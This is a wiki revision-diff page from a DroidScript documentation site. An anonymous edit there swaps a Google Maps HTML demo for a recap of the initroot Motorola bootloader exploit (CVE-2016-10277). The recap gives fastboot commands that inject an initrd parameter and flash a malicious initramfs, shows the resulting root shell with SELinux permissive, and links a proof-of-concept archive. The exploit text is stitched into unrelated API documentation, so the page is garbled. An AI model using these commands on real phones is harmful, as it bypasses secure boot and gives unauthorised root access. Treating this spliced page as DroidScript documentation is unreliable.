DroidScript wiki

(was AndroidScript) unofficial documentation by the community

User Tools

Site Tools


built_in:start

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
Next revision
Previous revision
Last revision Both sides next revision
built_in:start [2018/12/30 04:59]
114.125.15.7 [Table]
built_in:start [2018/12/30 13:41]
182.1.63.175 [Built-in features - DroidScript API]
Line 1: Line 1:
-<​!DOCTYPE html> +Sources: 
-<​html>​ +https://alephsecurity.com/2017/​08/​30/​untethered-initroot
-  <​head>​ +https://github.com/alephsecurity/initroot 
-    <​style>​ + 
-       /* Set the size of the div element that contains the map */ +initroot: Motorola Bootloader Kernel Cmdline Injection Secure Boot & Device Locking Bypass (CVE-2016-10277) 
-      #map { + 
-        height: 400px;  ​/* The height is 400 pixels *+By Roee Hay Aleph Research, HCL Technologies 
-        width100%;  ​/* The width is the width of the web page */ + 
-       } +Recap of the Vulnerability ​and the Tethered-jailbreak 
-    </style> + 
-  </head> +1. Vulnerable versions ​of the Motorola Android Bootloader (ABOOT) allow for kernel command-line injection. 
-  <​body>​ +2. Using a proprietary fastboot OEM commandonly available in the Motorola ABOOT, we can inject, through USB, a parameter named initrd which allows us to force the Linux kernel to populate initramfs into rootfs from a specified physical address
-    <​h3>​My Google Maps Demo</​h3>​ +3. We can abuse the ABOOT download functionality in order to place our own malicious initramfs ​at a known physical address, named SCRATCH_ADDR (see here for a list of devices). 
-    <!--The div element for the map --> +4Exploiting the vulnerability allows the adversary to gain unconfined root shell
-    <​div id="​map"><​/div> +5Since the initramfs payload is injected into RAM by the adversarythe vulnerability must be re-exploited on every reboot. 
-    <​script>​ +For examplehere is a successful run of the exploit on cedric (Moto G5
-// Initialize ​and add the map + 
-function initMap() { +$ fastboot oem config fsg-id "a initrd=0xA2100000,​1588598"​  
-  // The location ​of Uluru +$ fastboot flash aleph initroot-cedric.cpio.gz  
-  var uluru = {lat: -25.344lng: 131.036}; +$ fastboot continue 
-  // The map, centered ​at Uluru + 
-  var map = new google.maps.Map( +$ adb shell  
-      ​document.getElementById('​map'​){zoom: 4center: uluru}); +cedric:/ # id 
-  // The marker, positioned at Uluru +uid=0(rootgid=0(rootgroups=0(root),​1004(input),​1007(log),​1011(adb),​1015(sdcard_rw),​1028(sdcard_r),​3001(net_bt_admin),​3002(net_bt),​3003(inet),​3006(net_bw_stats),​3014(readproc) context=u:​r:​kernel:​s0 
-  var marker ​new google.maps.Marker({position:​ uluru, map: map}); +cedric:/ # getenforce 
-} +Permissive 
-    </​script>​ +cedric:/ # 
-    <​!--Load the API from the specified URL + 
-    * The async attribute allows the browser to render the page while the API loads + 
-    * The key parameter will contain your own API key (which is not needed for this tutorial) +Proof of Concept: 
-    * The callback parameter executes the initMap() function +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/​42601.zip 
-    ​-->​ + 
-    <​script async defer +            ​
-    ​src="​https://maps.googleapis.com/maps/api/js?​key=YOUR_API_KEY&​callback=initMap">​ +
-    </script>​ +
-  </body> +
-</​html>​+
 ====Links==== ====Links====
-^ App and Layout ​                     +^App and Layout^ 
-| [[app|app object]] ​                 +| [[app|app object]] | 
-| [[built_in:​app_events|App Events]] ​ +| [[built_in:​app_events|App Events]] | 
-| [[built_in:​layouts|Layouts]] ​       |+| [[built_in:​layouts|Layouts]]|
 ==== Controls ==== ==== Controls ====
 ^ Controls ​                                                  ^ ^ Controls ​                                                  ^
built_in/start.txt · Last modified: 2018/12/30 17:07 by administrator